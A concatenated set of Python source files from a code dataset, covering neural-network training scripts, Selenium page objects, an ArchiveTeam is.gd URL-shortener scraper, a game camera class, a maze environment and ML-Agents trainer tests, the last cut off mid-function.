r['class_ids'],\r\n test_set.class_names, r['scores'],\r\n title=\"Predictions\")\r\n","repo_name":"omerfarukkkoc/Mask_R-CNN","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38620643141","text":"import torch\nimport argparse\nimport os\n\nimport model \nimport utils\n\nfrom torch.utils.data import DataLoader\nfrom data import PolyphonicDataset \n\n# CUDA reset\ntorch.cuda.empty_cache()\n\n# Learning hyperparameters\nmax_epochs = 3500\nlearning_rate = 1e-4\n\n# Setup GPU stuff\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nprint('Using',device)\n\n# Parse args\nparser = argparse.ArgumentParser(description='Train model.')\nparser.add_argument('-corpus', dest='corpus', type=str, required=True, help='Path to the corpus.')\nparser.add_argument('-voc_p', dest='voc_p', type=str, required=True, help='Path to the pitch vocabulary file.')\nparser.add_argument('-voc_r', dest='voc_r', type=str, required=False, help='Path to the rhythm vocabulary file.')\nparser.add_argument('-l', dest='load', type=str, required=False, help='Path to saved model to load from')\nargs = parser.parse_args()\n\n# Load model architecture parameters\nparams = model.default_model_params()\n\n# Load datasets\ndataset_train = PolyphonicDataset(params, args.corpus, 'train', args.voc_p, args.voc_r)\ndataset_valid = PolyphonicDataset(params, args.corpus, 'valid', args.voc_p, args.voc_r)\ndataloader_train = DataLoader(dataset_train, batch_size=1, shuffle=True)\ndataloader_valid = DataLoader(dataset_valid, batch_size=1, shuffle=True)\n\n# Get blank idx values for CTC\nBLANK_VAL_NOTE = dataset_train.vocab_size_note\nBLANK_VAL_LENGTH = dataset_train.vocab_size_length\n\n# Model/optimizer creation\nnn_model = model.Baseline(params, BLANK_VAL_NOTE, BLANK_VAL_LENGTH)\nnn_model.to(device)\noptimizer = torch.optim.Adam(nn_model.parameters(), lr=learning_rate)\n\n# Initialize weights\ndef init_weights(m):\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight)\n m.bias.data.fill_(0)\nnn_model.apply(init_weights)\n\n# Load previous model if flag used\nif args.load:\n state_dict = torch.load(args.load)\n nn_model.load_state_dict(state_dict['model'])\n optimizer.load_state_dict(state_dict['optimizer'])\n print('Model loaded!', args.load)\nmodel_num = 1\n\n# Function to save model\ndef save_model():\n\n # Save model\n root_model_path = 'models/latest_model' + str(model_num) + '.pt'\n model_dict = nn_model.state_dict()\n state_dict = {'model': model_dict, 'optimizer': optimizer.state_dict()}\n torch.save(state_dict, root_model_path)\n\n print('Saved model')\n\n# Training loop\nfor epoch in range(max_epochs):\n\n print('Epoch %d...' % epoch)\n\n train_loss = 0\n\n # Training stats\n train_greedy_val_ed_note = 0 # sum of edit dist for note\n train_greedy_val_ed_len = 0 # sum of edit dist for length\n train_greedy_val_len = 0 # sum of target lengths\n train_greedy_num_correct_note = 0\n train_greedy_num_correct_len = 0\n train_greedy_num_samples = 0\n\n # Go through training data\n nn_model.train()\n for batch_num, batch in enumerate(dataloader_train):\n\n # Reset gradient\n optimizer.zero_grad()\n\n # Forward pass (try/except for large batches that may exceed GPU memory capacity)\n try:\n pitch_out, length_out = nn_model(batch['inputs'][0].to(device))\n except RuntimeError:\n print('Out of memory CUDA')\n continue\n out_lengths = batch['seq_lengths']\n\n # Get targets\n pitch_targets, length_targets = batch['targets']\n target_lengths = torch.zeros(len(pitch_targets), dtype=torch.int32)\n\n # Pad targets and get target lengths\n max_len_target = 0\n for t in pitch_targets:\n max_len_target = max(max_len_target, len(t))\n for i in range(len(pitch_targets)):\n target_lengths[i] = len(pitch_targets[i])\n while len(pitch_targets[i]) < max_len_target:\n pitch_targets[i].append(BLANK_VAL_NOTE)\n length_targets[i].append(BLANK_VAL_LENGTH)\n\n # Convert targets from python list to tensor\n pitch_targets = torch.tensor(pitch_targets)\n length_targets = torch.tensor(length_targets)\n \n # Backward pass and update weights\n length_loss = torch.nn.CTCLoss(blank=BLANK_VAL_LENGTH, zero_infinity=True)\n pitch_loss = torch.nn.CTCLoss(blank=BLANK_VAL_NOTE, zero_infinity=True)\n\n # Calculate CTC loss\n loss = length_loss(length_out, length_targets, out_lengths.clone().detach(), target_lengths) + \\\n pitch_loss(pitch_out, pitch_targets, out_lengths.clone().detach(), target_lengths)\n\n # Update weights\n loss.backward() \n optimizer.step()\n\n train_loss += loss.item()\n\n # Decode model output to get length/pitch prediction\n '''\n greedy_preds_len = utils.greedy_decode(length_out, out_lengths[0])\n greedy_preds_pitch = utils.greedy_decode(pitch_out, out_lengths[0])\n\n # Calculate SER and Sequence Accuracy (greedy decode) - LENGTH\n for i,pred in enumerate(greedy_preds_len):\n ed = utils.edit_distance(pred, length_targets[i][:target_lengths[i]].tolist())\n train_greedy_val_ed_len += ed\n train_greedy_val_len += target_lengths[i]\n train_greedy_num_correct_len += int(ed == 0)\n train_greedy_num_samples += 1\n '''\n\n # Show training loss every 500 batches\n if (batch_num) % 500 == 0:\n if batch_num == 0:\n print ('Training loss value at batch %d: %f' % ((batch_num),train_loss))\n else:\n print ('Training loss value at batch %d: %f' % ((batch_num),train_loss/500))\n train_loss = 0 \n\n # Save model every 1500 batches\n if (batch_num+1) % 1500 == 0:\n save_model() \n model_num += 1\n\n # Print training epoch stats\n img_name = batch['names'][0]\n #print('Train - Greedy SER at epoch %d: %f' % ((epoch+1), train_greedy_val_ed_len/train_greedy_val_len))\n #print('Train - Greedy sequence error rate at epoch %d: %f' % ((epoch+1), (train_greedy_num_samples-train_greedy_num_correct_len)/train_greedy_num_samples))\n #print('Train - Greedy (', img_name, '):', greedy_preds_len[0])\n\n # Validation statistics\n valid_loss = 0 \n greedy_val_ed_note = 0 # sum of edit dist for pitch\n greedy_val_ed_len = 0 # sum of edit dist for rhythm\n greedy_val_len = 0 # sum of target sequence lenghts\n greedy_num_correct_note = 0 # sum of completely correct pitch sequence predictions\n greedy_num_correct_len = 0 # sum of completely correct rhythm sequence predictions\n greedy_num_samples = 0 # number of samples evaluated\n \n # Go through validation data\n nn_model.eval()\n for batch_num, batch in enumerate(dataloader_valid):\n\n with torch.no_grad():\n\n # Forward pass\n pitch_out, length_out = nn_model(batch['inputs'][0].to(device))\n out_lengths = batch['seq_lengths']\n\n # Get targets\n pitch_targets, length_targets = batch['targets']\n target_lengths = torch.zeros(len(pitch_targets), dtype=torch.int32)\n\n # Pad targets and get target lengths\n max_len_target = 0\n for t in pitch_targets:\n max_len_target = max(max_len_target, len(t))\n for i in range(len(pitch_targets)):\n target_lengths[i] = len(pitch_targets[i])\n while len(pitch_targets[i]) < max_len_target:\n pitch_targets[i].append(BLANK_VAL_NOTE)\n length_targets[i].append(BLANK_VAL_LENGTH)\n\n # Convert python list to tensor\n pitch_targets = torch.tensor(pitch_targets)\n length_targets = torch.tensor(length_targets)\n\n # Calculate validation loss\n length_loss = torch.nn.CTCLoss(blank=BLANK_VAL_LENGTH, zero_infinity=True)\n pitch_loss = torch.nn.CTCLoss(blank=BLANK_VAL_NOTE, zero_infinity=True)\n loss = length_loss(length_out, length_targets, out_lengths.clone().detach()[0], target_lengths) + \\\n pitch_loss(pitch_out, pitch_targets, out_lengths.clone().detach()[0], target_lengths)\n\n valid_loss += loss.item()\n\n '''\n # Decode the model output to its prediction (greedy search) - LENGTH\n greedy_preds_len = utils.greedy_decode(length_out, out_lengths[0])\n\n # Calculate SER and Sequence Accuracy (greedy decode) - RHYTHM\n for i,pred in enumerate(greedy_preds_len):\n ed = utils.edit_distance(pred, length_targets[i][:target_lengths[i]].tolist())\n greedy_val_ed_len += ed\n greedy_val_len += target_lengths[i]\n greedy_num_correct_len += int(ed == 0)\n greedy_num_samples += 1\n\n # Decode the model output to its prediction (greedy search) - PITCH\n greedy_preds_note = utils.greedy_decode(pitch_out, out_lengths[0])\n\n # Calculate SER and Sequence Accuracy (greedy decode) - RHYTHM\n for i,pred in enumerate(greedy_preds_note):\n ed = utils.edit_distance(pred, pitch_targets[i][:target_lengths[i]].tolist())\n greedy_val_ed_note += ed\n greedy_num_correct_note += int(ed == 0)\n '''\n\n img_name = batch['names'][0]\n\n # Print validation stats\n print('Validation loss value at epoch %d: %f' % ((epoch+1),valid_loss/len(dataloader_valid)))\n\n '''\n print('LENGTH - Greedy SER at epoch %d: %f' % ((epoch+1), greedy_val_ed_len/greedy_val_len))\n print('LENGTH - Greedy sequence error rate at epoch %d: %f' % ((epoch+1), (greedy_num_samples-greedy_num_correct_len)/greedy_num_samples))\n print('LENGTH - Greedy Validation (', img_name, '):', greedy_preds_len[0])\n\n print('PITCH - Greedy SER at epoch %d: %f' % ((epoch+1), greedy_val_ed_note/greedy_val_len))\n print('PITCH - Greedy sequence error rate at epoch %d: %f' % ((epoch+1), (greedy_num_samples-greedy_num_correct_note)/greedy_num_samples))\n print('PITCH - Greedy Validation (', img_name, '):', greedy_preds_note[0])\n '''\n\n #if (epoch + 1) % 50 == 0:\n save_model() \n model_num += 1","repo_name":"sachindae/polyphonic-omr","sub_path":"experiment_code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10167,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"43187647128","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\nimport allure\n\nfrom locators.main_page_locators import MainPageLocators\nfrom locators.register_form_locators import RegisterFormLocators\nfrom locators.rent_page_locators import RentPageLocators\nfrom locators.check_status_locators import CheckStatusLocators\n\nclass RentPage:\n\n # конструктор класса\n def __init__(self, driver, data_base):\n self.driver = driver\n self.data_base = data_base\n\n\n # действия c элементами\n\n @allure.step(\"Ожидание загрузки окна\")\n def rent_window_loaded(self):\n WebDriverWait(self.driver, 10).until(expected_conditions.visibility_of_element_located((RentPageLocators.RENT_FORM_ORDER_BUTTON)))\n\n @allure.step(\"Выбор даты доставки в текущем месяце\")\n def choose_delivery_date_this_month(self):\n self.driver.find_element(*RentPageLocators.INPUT_DELIVERY_DATE_RENT_FORM).click()\n self.driver.find_element(*RentPageLocators.CHOOSE_DELIVERY_DATE_THIS_MONTH_RENT_FORM).click()\n\n @allure.step(\"Выбор даты доставки в след месяце\")\n def choose_delivery_date_next_month(self):\n self.driver.find_element(*RentPageLocators.INPUT_DELIVERY_DATE_RENT_FORM).click()\n self.driver.find_element(*RentPageLocators.CHANGE_MONTH_BUTTON).click()\n self.driver.find_element(*RentPageLocators.CHOOSE_DELIVERY_DATE_NEXT_MONTH_RENT_FORM).click()\n\n @allure.step(\"Выбор срока аренды 'сутки'\")\n def choose_rent_period_1day(self):\n self.driver.find_element(*RentPageLocators.CHOOSE_ARROW_DURATION_RENT_FORM).click()\n self.driver.find_element(*RentPageLocators.CHOOSE_DURATION_1DAY_RENT_FORM).click()\n\n @allure.step(\"Выбор срока аренды 7 дней\")\n def choose_rent_period_7days(self):\n self.driver.find_element(*RentPageLocators.CHOOSE_ARROW_DURATION_RENT_FORM).click()\n elem = self.driver.find_element(*RentPageLocators.CHOOSE_DURATION_7DAYS_RENT_FORM)\n self.driver.execute_script(\"arguments[0].scrollIntoView();\", elem)\n self.driver.find_element(*RentPageLocators.CHOOSE_DURATION_7DAYS_RENT_FORM).click()\n\n @allure.step(\"Выбор черного цвета самоката\")\n def choose_black_color(self):\n self.driver.find_element(*RentPageLocators.CHECKBOX_BLACK_COLOR_RENT_FORM).click()\n\n @allure.step(\"Выбор серого цвета самоката\")\n def choose_grey_color(self):\n self.driver.find_element(*RentPageLocators.CHECKBOX_GREY_COLOR_RENT_FORM).click()\n\n @allure.step(\"Ввeдeние текста в поле 'комментарий курьеру'\")\n def input_comment(self, comment):\n self.driver.find_element(*RentPageLocators.INPUT_COMMENT_RENT_FORM).send_keys(comment)\n\n @allure.step(\"Клик по кнопке 'Заказать'\")\n def click_order_button(self):\n self.driver.find_element(*RentPageLocators.RENT_FORM_ORDER_BUTTON).click()\n\n @allure.step(\"Клик на кнопку 'Да' в окне подтверждения\")\n def click_yes_button_confirm_window(self):\n WebDriverWait(self.driver, 10).until(expected_conditions.visibility_of_element_located((RentPageLocators.POP_UP_CONFIRM_WINDOW)))\n self.driver.find_element(*RentPageLocators.YES_BUTTON_CONFIRM_ORDER_WINDOW).click()\n WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable((RentPageLocators.BUTTON_CHECK_STATUS_POPUP_INFO_WINDOW)))\n\n @allure.step(\"Проверка оформлен ли заказ\")\n def check_order_status(self):\n window = expected_conditions.visibility_of_element_located((RentPageLocators.POP_UP_INFO_ORDER_CONFIRMED_WINDOW))\n button = expected_conditions.element_to_be_clickable((RentPageLocators.BUTTON_CHECK_STATUS_POPUP_INFO_WINDOW))\n return window and button\n\n @allure.step(\"Ожидание загрузки всплывающего окна\")\n def wait_order_status(self):\n WebDriverWait(self.driver, 10).until(expected_conditions.visibility_of_element_located((RentPageLocators.POP_UP_INFO_ORDER_CONFIRMED_WINDOW)))\n WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable((RentPageLocators.BUTTON_CHECK_STATUS_POPUP_INFO_WINDOW)))\n\n @allure.step(\"Оформление заказа на серый самокат с доставкой в э��ом месяце, сроком аренды 1 день и пустым полем 'комментарий'\")\n def order_grey_scooter_using_header_order_button(self, data):\n self.choose_delivery_date_this_month()\n self.choose_rent_period_1day()\n self.choose_grey_color()\n self.click_order_button()\n self.click_yes_button_confirm_window()\n\n @allure.step(\"Оформление заказа на черный самокат с доставкой в след.месяце, сроком аренды 7 дней и всеми заполненными полями\")\n def order_black_scooter_using_footer_order_button(self, data):\n self.choose_delivery_date_next_month()\n self.choose_rent_period_7days()\n self.choose_black_color()\n self.input_comment(data.get('comment'))\n self.click_order_button()\n self.click_yes_button_confirm_window()\n\n @allure.step(\"Переход на страницу статуса заказа\")\n def go_to_check_status_page(self):\n WebDriverWait(self.driver, 30).until(expected_conditions.element_to_be_clickable((RentPageLocators.BUTTON_CHECK_STATUS_POPUP_INFO_WINDOW)))\n self.driver.find_element(*RentPageLocators.BUTTON_CHECK_STATUS_POPUP_INFO_WINDOW).click()\n WebDriverWait(self.driver, 30).until(expected_conditions.visibility_of_element_located((CheckStatusLocators.DATA_FIELD)))\n elem = self.driver.find_element(*CheckStatusLocators.BUTTON_CANCEL_ORDER_STATUS_PAGE)\n self.driver.execute_script(\"arguments[0].scrollIntoView();\", elem)\n WebDriverWait(self.driver, 30).until(expected_conditions.element_to_be_clickable((CheckStatusLocators.BUTTON_CANCEL_ORDER_STATUS_PAGE)))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"irinadamoon/ya_p_scooter","sub_path":"pages/rent_page.py","file_name":"rent_page.py","file_ext":"py","file_size_in_byte":6490,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32740424330","text":"# encoding=utf-8\nfrom __future__ import unicode_literals\n\nimport re\nimport time\n\nfrom terroroftinytown.client import errors\nfrom terroroftinytown.client.errors import PleaseRetry\nfrom terroroftinytown.services.base import BaseService\nfrom terroroftinytown.services.rand import HashRandMixin\nfrom terroroftinytown.services.status import URLStatus\nfrom terroroftinytown.six.moves import html_parser\n\n\n# __all__ = ['IsgdService']\nclass IsgdService(BaseService):\n # NOTE: VgdService inherits from this class!\n\n # unavailable status code: 200 410\n # banned status code: 502\n \n def __init__(self, *args, **kwargs):\n BaseService.__init__(self, *args, **kwargs)\n self._processing_phishing_page = False\n\n def scrape_one(self, sequence_number):\n self._processing_phishing_page = False\n return BaseService.scrape_one(self, sequence_number)\n\n def process_unavailable(self, response):\n if not response.text:\n return (URLStatus.unavailable, None, None)\n\n # Catch both types encountered in the wild:\n #

Rate limit exceeded - you must wait at least 1798 seconds before we'll service this request.

\n #

Rate limit exceeded - please wait 1 minute before accessing more shortened URLs

\n if '

Rate limit exceeded - ' in response.text:\n raise PleaseRetry()\n\n if \"

Link Disabled

\" in response.text:\n return self.parse_blocked(response)\n if \"

The full original link is shown below. Click the link if you'd like to proceed to the destination shown:\" in response.text:\n return self.parse_preview(response)\n if 'Suspected phishing site | CloudFlare' in response.text:\n return self.process_phishing(response)\n\n raise errors.UnexpectedNoResult(\"Could not find processing unavailable for %s\" % self.current_shortcode)\n\n def parse_blocked(self, response):\n response.encoding = 'utf-8'\n\n match = re.search(\"

For reference and to help those fighting spam the original destination of this URL is given below \\(we strongly recommend you don't visit it since it may damage your PC\\): -
(.*)

is\\.gd

is\\.gd is a free service used to shorten long URLs\\.\", response.text)\n if not match:\n raise errors.UnexpectedNoResult(\"Could not find target URL in 'Link Disabled' page\")\n\n url = match.group(1)\n url = html_parser.HTMLParser().unescape(url)\n if url == \"\":\n return (URLStatus.unavailable, None, None)\n return (URLStatus.ok, url, response.encoding)\n\n def parse_preview(self, response):\n response.encoding = 'utf-8'\n\n match = re.search(\"Click the link if you'd like to proceed to the destination shown: -
\", response.text)\n if not match:\n raise errors.UnexpectedNoResult(\"Could not find target URL in 'Preview' page\")\n\n url = match.group(1)\n return (URLStatus.ok, html_parser.HTMLParser().unescape(url), response.encoding)\n \n def process_phishing(self, response):\n if self._processing_phishing_page:\n raise errors.UnexpectedNoResult(\"Alreadying processing phishing page for %s\" % self.current_shortcode)\n \n self._processing_phishing_page = True\n time.sleep(1)\n \n match = re.search(r'', response.text)\n \n url = 'https://is.gd/cdn-cgi/phish-bypass?u=/{0}&atok={1}'.format(\n self.current_shortcode, match.group(1))\n \n response = self.fetch_url(url)\n return self.process_response(response)\n\n\nclass Isgd6Service(HashRandMixin, IsgdService):\n def get_shortcode_width(self):\n return 6\n","repo_name":"ArchiveTeam/terroroftinytown","sub_path":"terroroftinytown/services/isgd.py","file_name":"isgd.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"48"} +{"seq_id":"6467611141","text":"from pyglfw.glfw import *\nimport vectormath\nfrom OpenGL.GLU import gluLookAt\nfrom math import atan2, pi\nfrom sound import sounds\n\nclass Camera: \n def __init__(self, x0, y0, z0, angleA0, angleB0): \n self.setCameraView(x0, y0, z0, angleA0, angleB0)\n self.target = None\n self.oldTargetPos = None\n self.delta = 10\n \n def setTarget(self, target):\n self.target = target\n def setCameraView(self, x, y, z, angleX, angleY): \n self.x = x \n self.y = y \n self.z = z \n self.angleX = angleX \n self.angleY = angleY \n\n def applyInputs(self, performance): \n moveSpeed = 5\n turnSpeed = 100\n mouseSPEEDmultiplier = 0.4\n deltaY = 0\n deltaX = 0\n\n if glfwGetKey(GLFW_KEY_UP):\n deltaX = +moveSpeed * performance \n if glfwGetKey(GLFW_KEY_DOWN): \n deltaX = -moveSpeed * performance \n if glfwGetKey(GLFW_KEY_LEFT): \n deltaY = -moveSpeed * performance \n if glfwGetKey(GLFW_KEY_RIGHT): \n deltaY = +moveSpeed * performance\n self.x += deltaX\n self.z += deltaY\n def draw(self):\n #set listener position at camera\n sounds.setListenerPosition((self.x, self.y, self.z))\n\n #target coord\n tx, ty, tz = self.target.body.getPosition()\n\n if self.oldTargetPos==None:\n self.oldTargetPos = tx, ty, tz\n \n gluLookAt(self.x, self.y, self.z, (tx+self.oldTargetPos[0])/2, (self.y+self.oldTargetPos[1])/2/3, (tz+self.oldTargetPos[2])/2, 0, 1, 0)\n self.oldTargetPos = tx, ty, tz\n\n v = vectormath.getVector((self.x, 0.0, self.z), (tx, 0.0, tz))\n self.angleY = -(atan2(v[2], v[0]) + pi/2)*180.0/pi","repo_name":"mmozeiko/Squares3D-prototype","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30480108647","text":"\"\"\"\nAdopted from https://github.com/ziatdinovmax/atomai by Maxim Ziatdinov (maxim.ziatdinov@ai4microscopy.com)\n\"\"\"\n\nfrom typing import List, Union, Type\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom blocks import ConvBlock, ResModule, UpsampleBlock\n\n\nclass SegResNet(nn.Module):\n '''\n Builds a fully convolutional neural network based on residual blocks\n for semantic segmentation\n Args:\n nb_classes:\n Number of classes in the ground truth\n nb_filters:\n Number of filters in 1st residual block\n (gets multiplied by 2 in each next block)\n batch_norm:\n Use batch normalization after each convolutional layer\n (Default: True)\n upsampling_mode:\n Select between \"bilinear\" or \"nearest\" upsampling method.\n Bilinear is usually more accurate,but adds additional (small)\n randomness. For full reproducibility, consider using 'nearest'\n (this assumes that all other sources of randomness are fixed)\n **layers (list):\n 3-element list with a number of residual blocks\n in each residual segment (Default: [2, 2])\n '''\n def __init__(self,\n nb_classes: int = 1,\n nb_filters: int = 32,\n batch_norm: bool = True,\n upsampling_mode: str = \"bilinear\",\n **kwargs: List[int]\n ) -> None:\n '''\n Initializes module parameters\n '''\n super(SegResNet, self).__init__()\n nbl = kwargs.get(\"layers\", [2, 2, 2])\n self.c1 = ConvBlock(\n 2, 1, 1, nb_filters, batch_norm=batch_norm\n )\n self.c2 = ResModule(\n 2, nbl[0], nb_filters, nb_filters*2, batch_norm=batch_norm\n )\n self.bn = ResModule(\n 2, nbl[1], nb_filters*2, nb_filters*4, batch_norm=batch_norm\n )\n self.upsample_block1 = UpsampleBlock(\n 2, nb_filters*4, nb_filters*2, 2, upsampling_mode\n )\n self.c3 = ResModule(\n 2, nbl[2], nb_filters*4, nb_filters*2, batch_norm=batch_norm\n )\n self.upsample_block2 = UpsampleBlock(\n 2, nb_filters*2, nb_filters, 2, upsampling_mode\n )\n self.c4 = ConvBlock(\n 2, 1, nb_filters*2, nb_filters, batch_norm=batch_norm\n )\n self.px = nn.Conv2d(nb_filters, nb_classes, 1, 1, 0)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n '''Defines a forward pass'''\n # Contracting path\n c1 = self.c1(x)\n d1 = F.max_pool2d(c1, kernel_size=2, stride=2)\n c2 = self.c2(d1)\n d2 = F.max_pool2d(c2, kernel_size=2, stride=2)\n # Bottleneck\n bn = self.bn(d2)\n # Expanding path\n u2 = self.upsample_block1(bn)\n u2 = torch.cat([c2, u2], dim=1)\n u2 = self.c3(u2)\n u1 = self.upsample_block2(u2)\n u1 = torch.cat([c1, u1], dim=1)\n u1 = self.c4(u1)\n # pixel-wise classification\n px = self.px(u1)\n return px","repo_name":"navn1/atomfinder_skunkworks","sub_path":"model/fcn.py","file_name":"fcn.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39545675100","text":"class MazeEnvironment:\n def __init__(self, maze: list):\n '''\n Initialization of the Maze Environment\n -------------\n maze : list\n List of list of c (clear) or w (wall) that represent the maze\n '''\n self.maze = maze\n self.num_rows = len(maze)\n self.num_columns = len(maze[0])\n\n # Available actions\n self.actions = ['up', 'down', 'left', 'right']\n\n # Status\n self.current = None\n self.previous = None\n\n self.terminal_state = (self.num_rows - 1, self.maze[-1].index('c'))\n\n def reset(self):\n '''\n Set state in the initial position.\n '''\n self.current = (0, 1) # Row 0, Column 1\n self.previous = None\n\n def step(self, action: str):\n \"\"\"\n Performs a movement in the environment and gets the new State and Reward\n ------------\n action : str\n One of the following actions: up, down, left, right\n \"\"\"\n self.current = self.move(action)\n\n return self.current, self.get_reward(), self.is_terminal_state()\n\n def move(self, action: str):\n \"\"\"\n Calculates the new State given a current State and an Action\n -----------\n action: str\n One of the following actions: up, down, left, right\n \"\"\"\n self.previous = self.current\n\n if action not in self.actions:\n raise Exception(f\"'{action}' is not a valid action!\")\n\n row = self.current[0]\n column = self.current[1]\n\n if action == 'up':\n return self.current if self.is_wall(row - 1, column) else (row - 1, column)\n elif action == 'down':\n return self.current if self.is_wall(row + 1, column) else (row + 1, column)\n elif action == 'left':\n return self.current if self.is_wall(row, column - 1) else (row, column - 1)\n elif action == 'right':\n return self.current if self.is_wall(row, column + 1) else (row, column + 1)\n\n def is_wall(self, row: int, column: int):\n '''\n Returns if the specific row, column is a wall of the Maze\n '''\n return self.maze[row][column] == 'w'\n\n def get_reward(self):\n \"\"\"\n Gets Reward of the last movement\n \"\"\"\n if self.is_terminal_state():\n return 500\n\n # Returns -2 if the movement was over a Wall, -1 in all other cases\n return -2 if self.previous == self.current else -1\n\n def is_terminal_state(self):\n '''\n If the State is in the last row, that means that is is in the exit\n '''\n return self.current[0] == self.num_rows - 1\n\n def set_state(self, row: int, column: int):\n \"\"\"\n Forces change to a specific state\n \"\"\"\n if not self.is_wall(row, column):\n self.current = (row, column)\n","repo_name":"juanmadlg/Generalized-Policy-Iteration","sub_path":"generalized_pollicy_iteration/maze_environment.py","file_name":"maze_environment.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44814491946","text":"import glob as gb\nimport pandas as pd \n\n#Collect the Comments files in a list to parse\ncommentsFile = \"posts*\" #the string that all comments.pk files contain\nfileList = [] #the list where we will store the comments.pk files\n\nfor file in gb.glob(commentsFile): #compile a list of all the comments.pk files\n\tfileList.append(file)\n\ndf = pd.concat([pd.read_pickle(file) for file in fileList], axis=0) #concatenate all comments files into one comment file\ndf.to_pickle('./allposts.pk') ","repo_name":"kennymuli/Reddit","sub_path":"concatenate.py","file_name":"concatenate.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31308539880","text":"import pytest\n\nimport numpy as np\n\nfrom mlagents.trainers.ghost.trainer import GhostTrainer\nfrom mlagents.trainers.ghost.controller import GhostController\nfrom mlagents.trainers.behavior_id_utils import BehaviorIdentifiers\nfrom mlagents.trainers.ppo.trainer import PPOTrainer\nfrom mlagents.trainers.agent_processor import AgentManagerQueue\nfrom mlagents.trainers.buffer import BufferKey, RewardSignalUtil\nfrom mlagents.trainers.tests import mock_brain as mb\nfrom mlagents.trainers.tests.mock_brain import copy_buffer_fields\nfrom mlagents.trainers.tests.test_trajectory import make_fake_trajectory\nfrom mlagents.trainers.settings import TrainerSettings, SelfPlaySettings\nfrom mlagents.trainers.tests.dummy_config import create_observation_specs_with_shapes\n\n\n@pytest.fixture\ndef dummy_config():\n return TrainerSettings(self_play=SelfPlaySettings())\n\n\nVECTOR_ACTION_SPACE = 1\nVECTOR_OBS_SPACE = 8\nDISCRETE_ACTION_SPACE = [3, 3, 3, 2]\nBUFFER_INIT_SAMPLES = 10241\nNUM_AGENTS = 12\n\n\n@pytest.mark.parametrize(\"use_discrete\", [True, False])\ndef test_load_and_set(dummy_config, use_discrete):\n mock_specs = mb.setup_test_behavior_specs(\n use_discrete,\n False,\n vector_action_space=DISCRETE_ACTION_SPACE\n if use_discrete\n else VECTOR_ACTION_SPACE,\n vector_obs_space=VECTOR_OBS_SPACE,\n )\n\n trainer_params = dummy_config\n trainer = PPOTrainer(\"test\", 0, trainer_params, True, False, 0, \"0\")\n trainer.seed = 1\n policy = trainer.create_policy(\"test\", mock_specs)\n trainer.seed = 20 # otherwise graphs are the same\n to_load_policy = trainer.create_policy(\"test\", mock_specs)\n\n weights = policy.get_weights()\n load_weights = to_load_policy.get_weights()\n try:\n for w, lw in zip(weights, load_weights):\n np.testing.assert_array_equal(w, lw)\n except AssertionError:\n pass\n\n to_load_policy.load_weights(weights)\n load_weights = to_load_policy.get_weights()\n\n for w, lw in zip(weights, load_weights):\n np.testing.assert_array_equal(w, lw)\n\n\ndef test_resume(dummy_config, tmp_path):\n mock_specs = mb.setup_test_behavior_specs(\n True, False, vector_action_space=[2], vector_obs_space=1\n )\n behavior_id_team0 = \"test_brain?team=0\"\n behavior_id_team1 = \"test_brain?team=1\"\n brain_name = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team0).brain_name\n tmp_path = tmp_path.as_posix()\n ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, tmp_path)\n controller = GhostController(100)\n trainer = GhostTrainer(\n ppo_trainer, brain_name, controller, 0, dummy_config, True, tmp_path\n )\n\n parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team0)\n policy = trainer.create_policy(parsed_behavior_id0, mock_specs)\n trainer.add_policy(parsed_behavior_id0, policy)\n\n parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team1)\n policy = trainer.create_policy(parsed_behavior_id1, mock_specs)\n trainer.add_policy(parsed_behavior_id1, policy)\n\n trainer.save_model()\n\n # Make a new trainer, check that the policies are the same\n ppo_trainer2 = PPOTrainer(brain_name, 0, dummy_config, True, True, 0, tmp_path)\n trainer2 = GhostTrainer(\n ppo_trainer2, brain_name, controller, 0, dummy_config, True, tmp_path\n )\n policy = trainer2.create_policy(parsed_behavior_id0, mock_specs)\n trainer2.add_policy(parsed_behavior_id0, policy)\n\n policy = trainer2.create_policy(parsed_behavior_id1, mock_specs)\n trainer2.add_policy(parsed_behavior_id1, policy)\n\n trainer1_policy = trainer.get_policy(parsed_behavior_id1.behavior_id)\n trainer2_policy = trainer2.get_policy(parsed_behavior_id1.behavior_id)\n weights = trainer1_policy.get_weights()\n weights2 = trainer2_policy.get_weights()\n\n for w, lw in zip(weights, weights2):\n np.testing.assert_array_equal(w, lw)\n\n\ndef test_process_trajectory(dummy_config):\n mock_specs = mb.setup_test_behavior_specs(\n True, False, vector_action_space=[2], vector_obs_space=1\n )\n behavior_id_team0 = \"test_brain?team=0\"\n 